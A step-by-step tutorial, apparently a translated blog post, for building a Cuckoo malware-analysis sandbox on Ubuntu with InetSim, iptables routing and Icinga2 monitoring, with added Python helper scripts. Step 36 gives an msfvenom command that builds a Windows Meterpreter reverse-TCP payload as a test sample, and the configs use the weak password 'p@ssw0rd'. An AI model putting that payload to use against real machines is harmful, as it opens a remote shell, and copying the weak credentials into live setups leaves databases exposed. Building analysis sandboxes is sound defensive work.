Cuckoo is a popular tool for malware analysis that takes much of the effort out of dynamic analysis, cutting both the time and the number of steps involved. Let's look at how the installation is done.
(This post was tested on Ubuntu 16.04 64 bit)
1. Install the required packages
```
apt-get install python python-sqlalchemy python-bson python-dpkt python-jinja2 python-magic python-pymongo python-gridfs python-libvirt python-bottle python-pefile bridge-utils python-pyrex tcpdump libjpeg8-dev zlib1g-dev libfreetype6-dev liblcms2-dev libwebp-dev tcl8.5-dev tk8.5-dev python-tk swig perl perl-base perl-modules-5.22 libnet-server-perl libnet-dns-perl libipc-shareable-perl libio-socket-ssl-perl -y
```
2. Install the Python libraries with pip
```
pip install jinja2 pymongo bottle pefile cybox maec django chardet
```
3. Set up packet sniffing (give tcpdump the capabilities it needs and stop AppArmor from confining it)
```
setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
getcap /usr/sbin/tcpdump
apt-get install apparmor-utils
aa-disable /usr/sbin/tcpdump
```
4. Install ssdeep, pydeep, yara, distorm, Volatility and VirtualBox
```
# ssdeep (fuzzy hashing) and its Python binding pydeep
wget https://downloads.sourceforge.net/project/ssdeep/ssdeep-2.13/ssdeep-2.13.tar.gz
tar xvf ssdeep-2.13.tar.gz
cd ssdeep-2.13
./configure && make && make install
cd ..
git clone https://github.com/kbandla/pydeep
cd pydeep
python setup.py build
python setup.py install
cd ..
# yara and distorm (disassembler used by Volatility)
apt-get install yara python-yara
git clone https://github.com/gdabah/distorm
cd distorm
python setup.py build
python setup.py install
cd ..
# Volatility 2.6 standalone build, installed as /usr/sbin/volatility
wget http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_lin64_standalone.zip
unzip volatility_2.6_lin64_standalone.zip
cd volatility_2.6_lin64_standalone
mv volatility_2.6_lin64_standalone /usr/sbin/volatility
cd ..
apt-get install virtualbox
pip install requests==2.7.0
pip install requests==2.13.0
```
5. Create a user for cuckoo and install cuckoo
```
adduser cuckoo
# -a keeps the user's existing groups while adding vboxusers
usermod -a -G vboxusers cuckoo
sudo pip install -U pip setuptools
sudo pip install -U cuckoo
```
6. Create iptables rules for monitoring the traffic
```
sudo iptables -t nat -A POSTROUTING -o eth0 -s 192.168.56.0/24 -j MASQUERADE

# Default drop.
sudo iptables -P FORWARD DROP

# Existing connections.
sudo iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT

# Accept connections from vboxnet to the whole internet.
sudo iptables -A FORWARD -s 192.168.56.0/24 -j ACCEPT

# Internal traffic.
sudo iptables -A FORWARD -s 192.168.56.0/24 -d 192.168.56.0/24 -j ACCEPT

# Log stuff that reaches this point (could be noisy).
sudo iptables -A FORWARD -j LOG
```
7. Enable IP forwarding
```
echo 1 | sudo tee -a /proc/sys/net/ipv4/ip_forward
sudo sysctl -w net.ipv4.ip_forward=1
```
8. Install iptables-persistent so the iptables rules are loaded again after a reboot
```
sudo apt-get install iptables-persistent
```
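With the rules from step 6 in place, the only forwarded packets that reach the final `-j LOG` rule are those that matched no ACCEPT rule: packets that are not from 192.168.56.0/24 and not part of an existing connection, which in practice means unsolicited traffic aimed at a sandbox VM from outside. The following Python 3 script is an added example, not part of the original post; it parses the kernel log records that rule writes and summarises them. The sample lines are constructed, and the default log path `/var/log/kern.log` is an assumption (Ubuntu's usual location).

```python
"""Summarise what reaches the trailing `iptables -A FORWARD -j LOG` rule.
Added example, not part of the original post. Reads /var/log/kern.log
(assumed Ubuntu default) when run as a script."""
import re
import sys
from collections import Counter

SANDBOX_NET = "192.168.56."                  # the VM subnet used throughout the post
FIELD_RE = re.compile(r"\b([A-Z]+)=(\S+)")  # KEY=value pairs of a netfilter LOG record

# Constructed sample records in the format the kernel writes (not real captures).
SAMPLE_LINES = [
    "Jul 10 10:03:07 lab-64 kernel: [ 1234.567890] IN=eth0 OUT=vboxnet0 MAC=08:00:27:aa:bb:cc:52:54:00:11:22:33:08:00 "
    "SRC=203.0.113.9 DST=192.168.56.101 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=40000 DPT=3389 "
    "WINDOW=29200 RES=0x00 SYN URGP=0",
    "Jul 10 10:03:08 lab-64 kernel: [ 1235.567890] IN=eth0 OUT=vboxnet0 MAC=08:00:27:aa:bb:cc:52:54:00:11:22:33:08:00 "
    "SRC=203.0.113.9 DST=192.168.56.101 LEN=60 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=40001 DPT=3389 "
    "WINDOW=29200 RES=0x00 SYN URGP=0",
    "Jul 10 10:03:09 lab-64 kernel: [ 1236.000000] IN=eth0 OUT=vboxnet0 MAC=08:00:27:aa:bb:cc:52:54:00:11:22:33:08:00 "
    "SRC=198.51.100.7 DST=192.168.56.101 LEN=84 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=ICMP TYPE=8 CODE=0 ID=1 SEQ=1",
    "Jul 10 10:03:10 lab-64 kernel: [ 1237.000000] Linux version 4.4.0-83-generic (unrelated line)",
]


def parse_log_line(line):
    """Return the KEY=value fields of one netfilter LOG record, or None for other lines."""
    if "IN=" not in line or "OUT=" not in line:
        return None
    return dict(FIELD_RE.findall(line))


def summarise(lines):
    """Count logged packets by (src, dst, proto, dport); ICMP has no port, shown as '-'."""
    counts = Counter()
    for line in lines:
        fields = parse_log_line(line)
        if fields:
            key = (fields.get("SRC"), fields.get("DST"), fields.get("PROTO"), fields.get("DPT", "-"))
            counts[key] += 1
    return counts


def inbound_to_sandbox(counts):
    """Outside sources that sent packets into the sandbox subnet, sorted."""
    return sorted({src for (src, dst, _, _) in counts
                   if dst and dst.startswith(SANDBOX_NET) and not src.startswith(SANDBOX_NET)})


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "/var/log/kern.log"
    with open(path) as fh:
        counts = summarise(fh)
    for (src, dst, proto, dport), n in counts.most_common():
        print("%5d  %s -> %s %s/%s" % (n, src, dst, proto, dport))
    print("outside hosts reaching sandbox VMs:", ", ".join(inbound_to_sandbox(counts)))
```

If traffic from 192.168.56.0/24 itself shows up in this summary, the ACCEPT rules were not loaded (for example after a reboot without iptables-persistent), which is the quickest way to notice that the rule set has been lost.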
9. Set up an interface for each routing role. Cuckoo supports the following routing options:
- None Routing: no routing at all; the traffic goes nowhere.
- Drop Routing: drops all traffic that does not belong to Cuckoo, including the VM subnet.
- Internet Routing: normal internet access (called the Dirty Line, because the malware will use this network to fetch the rest of its payload).
- InetSim Routing: routes everything to an InetSim instance, which offers only fake services meant to fool malware that tries to contact the outside.
- Tor Routing: routes all traffic through Tor.
- VPN Routing: routes all traffic through one of perhaps multiple pre-defined VPN endpoints.
10. Configure /etc/iproute2/rt_tables so that iproute2 can be used, by adding our interface to it
```
#
# reserved values
#
255 local
254 main
253 default
0 unspec
#
# local
#
400 eth0
```
11. Install InetSim
```
groupadd inetsim
echo "deb http://www.inetsim.org/debian/ binary/" >> /etc/apt/sources.list
wget -O - http://www.inetsim.org/inetsim-archive-signing-key.asc | apt-key add -
aptitude update
aptitude install inetsim -y
```
12. Bind all InetSim services to the IP we configured in VBox, which here is 192.168.56.1, so in /etc/inetsim/inetsim.conf set
```
service_bind_address 192.168.56.1
```
If we want all DNS queries to arrive at the InetSim machine, InetSim must also provide the DNS service, which is set with
```
dns_default_ip 192.168.56.1
```
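To confirm what a sandbox VM will actually see from the InetSim DNS service, here is an added Python 3 example (not from the original post and not part of InetSim). It builds a raw DNS A query, sends it to 192.168.56.1, and parses the reply; with `dns_default_ip 192.168.56.1` every name should resolve to the InetSim host, so the malware's connection attempts land on the fake services. The `SAMPLE_REPLY` is a constructed packet so the parser can be exercised without a running server; the query function and the `www.example.com` name are illustrative.

```python
"""Check what the InetSim DNS service hands back to the sandbox VM.
Added example, not part of the original post or of InetSim. Assumes the
settings above: InetSim bound to 192.168.56.1 with dns_default_ip 192.168.56.1."""
import socket
import struct

INETSIM_IP = "192.168.56.1"   # service_bind_address from the step above


def build_query(name, txid=0x1234):
    """Build a minimal DNS A/IN query for `name` with the RD flag set."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.strip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)


def _skip_name(data, offset):
    """Advance past a possibly compressed domain name starting at offset."""
    while True:
        length = data[offset]
        if length == 0:
            return offset + 1
        if length & 0xC0 == 0xC0:      # two-byte compression pointer
            return offset + 2
        offset += 1 + length


def parse_a_records(resp):
    """Return the IPv4 addresses from the answer section of a DNS reply."""
    _, _, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", resp[:12])
    offset = 12
    for _ in range(qdcount):
        offset = _skip_name(resp, offset) + 4           # skip QTYPE and QCLASS
    addrs = []
    for _ in range(ancount):
        offset = _skip_name(resp, offset)
        rtype, _, _, rdlen = struct.unpack("!HHIH", resp[offset:offset + 10])
        offset += 10
        if rtype == 1 and rdlen == 4:                   # A record
            addrs.append(socket.inet_ntoa(resp[offset:offset + 4]))
        offset += rdlen
    return addrs


def resolves_to_inetsim(addrs, inetsim_ip=INETSIM_IP):
    """True when every answer points at the InetSim host, the expected outcome."""
    return bool(addrs) and all(a == inetsim_ip for a in addrs)


def query(name, server=INETSIM_IP, timeout=2.0):
    """Send the query to InetSim over UDP/53 and return the parsed A records."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_query(name), (server, 53))
        data, _ = sock.recvfrom(512)
    finally:
        sock.close()
    return parse_a_records(data)


# Constructed reply of the shape InetSim returns for any name: one A record
# carrying dns_default_ip. Used to exercise the parser without a live server.
SAMPLE_REPLY = (
    struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
    + b"\x07example\x03com\x00" + struct.pack("!HH", 1, 1)
    + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 3600, 4) + socket.inet_aton(INETSIM_IP)
)

if __name__ == "__main__":
    answers = query("www.example.com")
    print(answers, "OK" if resolves_to_inetsim(answers) else "NOT pointing at InetSim")
```

Run it from the host after InetSim is started; an empty answer or a timeout usually means the service is bound to a different address than the VM's default gateway, which is exactly the mismatch that lets sample traffic leak past the fake services.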
13. Start cuckoo so that it generates the configuration
```
cuckoo -d
```
The generated configuration consists of:
- cuckoo.conf: general behaviour and analysis options.
- auxiliary.conf: enabling and configuring auxiliary modules.
- virtualbox.conf: options for the VirtualBox machinery (edited in step 33).
- memory.conf: Volatility configuration.
- processing.conf: enabling and configuring processing modules.
- reporting.conf: enabling and disabling report formats.
- routing.conf: sets the routing of the Virtual Machine.
14. Edit routing.conf
```
vim /home/<username>/.cuckoo/conf/routing.conf
```
15. Set the inetsim section to
```
[inetsim]
enabled = yes
server = 192.168.56.1
```
16. Install Icinga2 to monitor Cuckoo
```
wget -O - http://packages.icinga.org/icinga.key | apt-key add -
echo 'deb http://packages.icinga.com/ubuntu icinga-zesty main' > /etc/apt/sources.list.d/icinga.list
echo 'deb-src http://packages.icinga.com/ubuntu icinga-zesty main' >> /etc/apt/sources.list.d/icinga.list
apt-get update
apt-get install icinga2 php-icinga
echo 'date.timezone = "Asia/Bangkok"' >> /etc/php/7.0/fpm/php.ini
icinga2 feature enable command
service icinga2 restart
```
17. Install postgresql and set up the database
```
apt-get install postgresql icinga2-ido-pgsql
sudo -u postgres psql
postgres=# CREATE USER icingaweb WITH PASSWORD 'p@ssw0rd';
postgres=# CREATE DATABASE icingaweb;
postgres=# \q
```
18. Create the file /etc/icinga2/features-enabled/ido-pgsql.conf with the following content
```
library "db_ido_pgsql"

object IdoPgsqlConnection "ido-pgsql" {
  user = "icinga2"
  password = "p@ssw0rd"
  host = "localhost"
  database = "icinga2"
}
```
19. Install icingaweb2
```
apt-get install icingaweb2 icingaweb2-common php-icinga php-pdo-pgsql
```
20. Create the icinga site configuration for nginx (/etc/nginx/sites-available/icinga)
```
server {
    listen 0.0.0.0:80;
    server_name icinga2.yourdomain.tld;

    location ~ ^/index.php(.*)$ {
        fastcgi_pass unix:/run/php/php7.0-fpm.sock;
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME /usr/share/icingaweb2/public/index.php;
        fastcgi_param ICINGAWEB_CONFIGDIR /etc/icingaweb2;
    }

    location ~ ^/(.*)? {
        allow all;
        alias /usr/share/icingaweb2/public;
        index index.php;
        rewrite ^/$ /dashboard;
        try_files $1 $uri $uri/ /index.php$is_args$args;
    }
}
```
21. Remove the default file from sites-enabled and link icinga from sites-available into it
```
ln -s /etc/nginx/sites-available/icinga /etc/nginx/sites-enabled/
cd /etc/nginx/sites-enabled/
rm default
/etc/init.d/nginx restart
```
22. Create a setup token with the command
```
icingacli setup token create
```
23. Go to http://localhost and enter the token
- Step 'Modules': click Next
- Step 'Icinga Web 2': should be all green
- Step 'Authentication': click Next
- Step 'Database Resource': fill in the PostgreSQL details
- Step 'Authentication Backend': click Next
- Step 'Administration': create an admin account
- Click Next on all remaining steps
24. Create a master node so that any icinga2 node can be monitored
```
icinga2 node wizard
```
```
root@lab-64:~# icinga2 node wizard
Welcome to the Icinga 2 Setup Wizard!

We'll guide you through all required configuration details.

Please specify if this is a satellite setup ('n' installs a master setup) [Y/n]: n
Starting the Master setup routine...
Please specify the common name (CN) [lab-64]: cuckoomaster
Checking for existing certificates for common name 'cuckoomaster'...
Certificates not yet generated. Running 'api setup' now.
information/cli: Generating new CA.
information/base: Writing private key to '/var/lib/icinga2/ca/ca.key'.
information/base: Writing X509 certificate to '/var/lib/icinga2/ca/ca.crt'.
information/cli: Generating new CSR in '/etc/icinga2/pki/cuckoomaster.csr'.
information/base: Writing private key to '/etc/icinga2/pki/cuckoomaster.key'.
information/base: Writing certificate signing request to '/etc/icinga2/pki/cuckoomaster.csr'.
information/cli: Signing CSR with CA and writing certificate to '/etc/icinga2/pki/cuckoomaster.crt'.
information/pki: Writing certificate to file '/etc/icinga2/pki/cuckoomaster.crt'.
information/cli: Copying CA certificate to '/etc/icinga2/pki/ca.crt'.
Generating master configuration for Icinga 2.
information/cli: Adding new ApiUser 'root' in '/etc/icinga2/conf.d/api-users.conf'.
information/cli: Enabling the 'api' feature.
Enabling feature api. Make sure to restart Icinga 2 for these changes to take effect.
information/cli: Dumping config items to file '/etc/icinga2/zones.conf'.
information/cli: Created backup file '/etc/icinga2/zones.conf.orig'.
Please specify the API bind host/port (optional):
Bind Host []: 127.0.0.1
Bind Port []:
information/cli: Created backup file '/etc/icinga2/features-available/api.conf.orig'.
warning/cli: CN 'cuckoomaster' does not match the default FQDN 'lab-64'. Requires update for NodeName constant in constants.conf!
information/cli: Updating constants.conf.
information/cli: Created backup file '/etc/icinga2/constants.conf.orig'.
information/cli: Updating constants file '/etc/icinga2/constants.conf'.
information/cli: Updating constants file '/etc/icinga2/constants.conf'.
information/cli: Updating constants file '/etc/icinga2/constants.conf'.
Done.

Now restart your Icinga 2 daemon to finish the installation!
```
```
/etc/init.d/icinga2 restart
```
25. Create the icinga2 monitoring node for Cuckoo (first generate its ticket on the master)
```
icinga2 pki ticket --cn 'cuckooicinga2'
```
```
root@lab-64:~# icinga2 node wizard
Welcome to the Icinga 2 Setup Wizard!

We'll guide you through all required configuration details.

Please specify if this is a satellite setup ('n' installs a master setup) [Y/n]:
Starting the Node setup routine...
Please specify the common name (CN) [lab-64]: cuckooicinga2
Please specify the master endpoint(s) this node should connect to:
Master Common Name (CN from your master setup): cuckoomaster
Do you want to establish a connection to the master from this node? [Y/n]:
Please fill out the master connection information:
Master endpoint host (Your master's IP address or FQDN): 127.0.0.1
Master endpoint port [5665]:
Add more master endpoints? [y/N]: N
Please specify the master connection for CSR auto-signing (defaults to master endpoint host):
Host [127.0.0.1]:
Port [5665]:
warning/cli: Backup file '/etc/icinga2/pki/cuckooicinga2.key.orig' already exists. Skipping backup.
warning/cli: Backup file '/etc/icinga2/pki/cuckooicinga2.crt.orig' already exists. Skipping backup.
information/base: Writing private key to '/etc/icinga2/pki/cuckooicinga2.key'.
information/base: Writing X509 certificate to '/etc/icinga2/pki/cuckooicinga2.crt'.
information/cli: Fetching public certificate from master (127.0.0.1, 5665):

Certificate information:

 Subject:     CN = cuckoomaster
 Issuer:      CN = Icinga CA
 Valid From:  Jul 10 04:18:02 2017 GMT
 Valid Until: Jul 6 04:18:02 2032 GMT
 Fingerprint: 78 6B 82 C6 68 77 6E E8 E3 16 DB 64 66 CD AE 92 A2 79 43 A2

Is this information correct? [y/N]: y
information/cli: Received trusted master certificate.

Please specify the request ticket generated on your Icinga 2 master.
 (Hint: # icinga2 pki ticket --cn 'cuckooicinga2'):
Please specify the request ticket generated on your Icinga 2 master.
 (Hint: # icinga2 pki ticket --cn 'cuckooicinga2'): 809f5b57ff41c02a015ec3cc6652d5694f8e96a0
information/cli: Requesting certificate with ticket '809f5b57ff41c02a015ec3cc6652d5694f8e96a0'.
information/cli: Created backup file '/etc/icinga2/pki/ca.crt.orig'.
warning/cli: Backup file '/etc/icinga2/pki/cuckooicinga2.crt.orig' already exists. Skipping backup.
information/cli: Writing signed certificate to file '/etc/icinga2/pki/cuckooicinga2.crt'.
information/cli: Writing CA certificate to file '/etc/icinga2/pki/ca.crt'.
Please specify the API bind host/port (optional):
Bind Host []:
Bind Port []:
Accept config from master? [y/N]: y
Accept commands from master? [y/N]: y
information/cli: Disabling the Notification feature.
Disabling feature notification. Make sure to restart Icinga 2 for these changes to take effect.
information/cli: Enabling the Apilistener feature.
warning/cli: Feature 'api' already enabled.
warning/cli: Backup file '/etc/icinga2/features-available/api.conf.orig' already exists. Skipping backup.
information/cli: Generating local zones.conf.
information/cli: Dumping config items to file '/etc/icinga2/zones.conf'.
warning/cli: Backup file '/etc/icinga2/zones.conf.orig' already exists. Skipping backup.
warning/cli: CN 'cuckooicinga2' does not match the default FQDN 'lab-64'. Requires update for NodeName constant in constants.conf!
information/cli: Updating constants.conf.
warning/cli: Backup file '/etc/icinga2/constants.conf.orig' already exists. Skipping backup.
information/cli: Updating constants file '/etc/icinga2/constants.conf'.
information/cli: Updating constants file '/etc/icinga2/constants.conf'.
Done.

Now restart your Icinga 2 daemon to finish the installation!
```
```
/etc/init.d/icinga2 restart
```
We can set up whatever notifications we want by defining them in /etc/icinga2/conf.d/users.conf
```
object User "sysadmin" {
  display_name = "System Administrator"
  enable_notifications = true
  states = [ Warning, Critical ]
  types = [ Problem, Recovery ]
  email = "[email protected]"
}

template Notification "generic-notification" {
  states = [ Warning, Critical, Unknown ]
  types = [ Problem, Acknowledgement, Recovery, Custom, FlappingStart, FlappingEnd, DowntimeStart, DowntimeEnd, DowntimeRemoved ]
}

apply Notification "notify-sysadmin" to Service {
  import "generic-notification"
  command = "notify-cuckoo"
  users = [ "sysadmin" ]
  assign where service.name in ["check_cuckoo", "ssh", "ping4"]
}

object NotificationCommand "notify-cuckoo" {
  import "plugin-notification-command"
  command = [ SysconfDir + "/icinga2/scripts/notify.py" ]
  env = {
    NOTIFICATIONTYPE = "$notification.type$"
    SERVICEDESC = "$service.name$"
    HOSTALIAS = "$host.display_name$"
    HOSTADDRESS = "$address$"
    SERVICESTATE = "$service.state$"
    LONGDATETIME = "$icinga.long_date_time$"
    SERVICEOUTPUT = "$service.output$"
    NOTIFICATIONAUTHORNAME = "$notification.author$"
    NOTIFICATIONCOMMENT = "$notification.comment$"
    HOSTDISPLAYNAME = "$host.display_name$"
    SERVICEDISPLAYNAME = "$service.display_name$"
    USEREMAIL = "$user.email$"
  }
}
```
Then create the file /etc/icinga2/scripts/notify.py to send the notification in whatever way we want.
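As an added example of such a notify.py (not the post's own script and not part of Icinga), the following Python 3 script reads the variables exported by the `env = { ... }` block above, appends the notification to a log file and e-mails USEREMAIL through a local MTA when one listens on localhost:25. The log path `/var/log/icinga2/cuckoo-notify.log` and the sender address `icinga@localhost` are assumptions; the Icinga configuration above needs no change for it to work, apart from making the script executable.

```python
#!/usr/bin/env python3
"""A notify.py for the NotificationCommand above. Added example, not the post's
own script and not part of Icinga. Reads the variables from the `env` block,
logs the notification (path assumed) and mails USEREMAIL via localhost:25."""
import os
import smtplib
from email.mime.text import MIMEText

LOG_PATH = "/var/log/icinga2/cuckoo-notify.log"   # assumed location
SENDER = "icinga@localhost"                        # assumed sender address
FIELDS = ["NOTIFICATIONTYPE", "HOSTDISPLAYNAME", "HOSTADDRESS", "SERVICEDISPLAYNAME",
          "SERVICESTATE", "LONGDATETIME", "SERVICEOUTPUT",
          "NOTIFICATIONAUTHORNAME", "NOTIFICATIONCOMMENT"]


def build_subject(env):
    """One-line summary, e.g. '[Icinga] PROBLEM: check_cuckoo on lab-64 is CRITICAL'."""
    return "[Icinga] %s: %s on %s is %s" % (
        env.get("NOTIFICATIONTYPE", "?"), env.get("SERVICEDISPLAYNAME", "?"),
        env.get("HOSTDISPLAYNAME", "?"), env.get("SERVICESTATE", "?"))


def build_body(env):
    """KEY: value lines for the fields Icinga filled in; empty ones are left out."""
    return "\n".join("%s: %s" % (key, env[key]) for key in FIELDS if env.get(key)) + "\n"


def deliver(env, log_path=LOG_PATH, smtp_host="localhost"):
    """Log the notification and try e-mail; returns the subject that was built."""
    subject, body = build_subject(env), build_body(env)
    if log_path:
        with open(log_path, "a") as fh:
            fh.write(subject + "\n" + body + "\n")
    recipient = env.get("USEREMAIL")
    if recipient:
        msg = MIMEText(body)
        msg["Subject"], msg["From"], msg["To"] = subject, SENDER, recipient
        try:
            with smtplib.SMTP(smtp_host, 25, timeout=5) as smtp:
                smtp.sendmail(SENDER, [recipient], msg.as_string())
        except (OSError, smtplib.SMTPException):
            pass    # no MTA reachable: the log entry above still records the event
    return subject


if __name__ == "__main__":
    deliver(os.environ)
```

Because the script only ever reads its input from the environment Icinga sets, it never interpolates `$service.output$` into a shell command line, which is the usual mistake in hand-written notification scripts.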
26. Create a Virtual Machine to use as the sandbox
```
VBoxManage createvm --name "WindowsXP" --register
# set the memory and boot from dvd
VBoxManage modifyvm "WindowsXP" --memory 1024 --acpi off --boot1 dvd
# set the network interface to hostonly
VBoxManage modifyvm "WindowsXP" --nic1 hostonly --hostonlyadapter1 vboxnet0
# set the VM type to WindowsXP
VBoxManage modifyvm "WindowsXP" --ostype windowsxp
# create the virtual hdd (the path contains a space, so it must be quoted)
VBoxManage createhd --filename "/root/VirtualBox VMs/WindowsXP/WindowsXP.vdi" --size 20480
# add the virtual HDD to the Windows XP VM
VBoxManage storagectl "WindowsXP" --name "IDE Controller" --add ide
VBoxManage storageattach "WindowsXP" --storagectl "IDE Controller" --port 0 --device 0 --type hdd --medium "/root/VirtualBox VMs/WindowsXP/WindowsXP.vdi"
# add the ISO to the Windows XP VM
VBoxManage storageattach "WindowsXP" --storagectl "IDE Controller" --port 1 --device 0 --type dvddrive --medium /path/of/windows/xp
# open the remote port 3389
VBoxManage modifyvm "WindowsXP" --vrde on
# start the VM
VBoxHeadless --startvm "WindowsXP"
```
27. Remote in to set up Windows, or open VirtualBox to carry out the rest of the installation
28. Switch the Virtual Machine's network mode to NAT in order to install the Cuckoo client
```
VBoxManage modifyvm "WindowsXP" --nic1 nat
```
29. To make the environment suitable both for monitoring by Cuckoo and for being easy to compromise, do the following:
• Install Python in Windows XP
• Disable the Windows Firewall
• Disable automatic updates
• Install Adobe Reader version 9 and Microsoft Office
30. Install the Cuckoo agent by copying the file from /home/
31. Edit the Registry startup entry so the agent starts every time the machine boots
```
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /t REG_SZ /v CuckooAgent /d "C:\Windows\System32\agent.py"
```
32. Remove the NAT, then shut the Virtual Machine down and take a snapshot
```
# put nic1 back on the host-only adapter from step 26, so the VM is reachable at 192.168.56.101
VBoxManage modifyvm "WindowsXP" --nic1 hostonly --hostonlyadapter1 vboxnet0
VBoxManage snapshot "WindowsXP" take "After preparing"
```
33. Configure Cuckoo
Edit /home/<username>/.cuckoo/conf/virtualbox.conf
```
[virtualbox]
mode = headless
path = /usr/bin/VBoxManage
interface = vboxnet0
machines = WindowsXP

[WindowsXP]
label = WindowsXP
platform = windows
ip = 192.168.56.101
```
34. Start WindowsXP again
```
VBoxHeadless --startvm "WindowsXP"
```
35. Run cuckoo (the rooter applies the routing from step 9 and must be running alongside cuckoo)
```
cuckoo rooter /tmp/cuckoo-rooter
cuckoo -d
```
36. Create a malicious test file with Metasploit
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=4444 -f exe -o malware.exe
```
37. Submit the file
```
cuckoo submit malware.exe
```
We can submit in several ways
```
# Submit a URL
$ cuckoo submit --url http://www.example.com

# Submit a file with a given priority
$ cuckoo submit --priority 5 /path/to/binary

# Submit a file with a given analysis timeout
$ cuckoo submit --timeout 60 /path/to/binary

# Submit a file with parameters for the file
$ cuckoo submit --package exe --options arguments=--dosomething /path/to/binary.exe

# Submit a file to a specific Virtual Machine
$ cuckoo submit --machine cuckoo1 /path/to/binary

# Submit a file to a specific Virtual Machine OS
$ cuckoo submit --platform windows /path/to/binary

# Submit a file and take a memory dump as well
$ cuckoo submit --memory /path/to/binary
```
38. Set up the cuckoo web server
```
apt-get install mongodb
```
Set in ~/.cuckoo/conf/reporting.conf
```
[mongodb]
enabled = yes
```
Run the web server (remember that cuckoo itself must also be running if you want to submit files)
```
cuckoo web runserver
```
Sources:
https://www.proteansec.com/linux/installing-using-cuckoo-malware-analysis-sandbox/
https://github.com/spender-sandbox/cuckoo-modified
https://precisionsec.com/installing-and-configuring-inetsim-on-ubuntu/
https://infosecspeakeasy.org/t/howto-build-a-cuckoo-sandbox/27
https://jbremer.org/vmcloak3/
https://sector.ca/wp-content/uploads/presentations16/simmons%20Open%20Source%20Malware%20Lab%20SecTor.pdf
https://cuckoo.sh/docs/
https://www.techsuii.com/2017/07/10/how-to-install-cuckoo-automated-malware-analysis/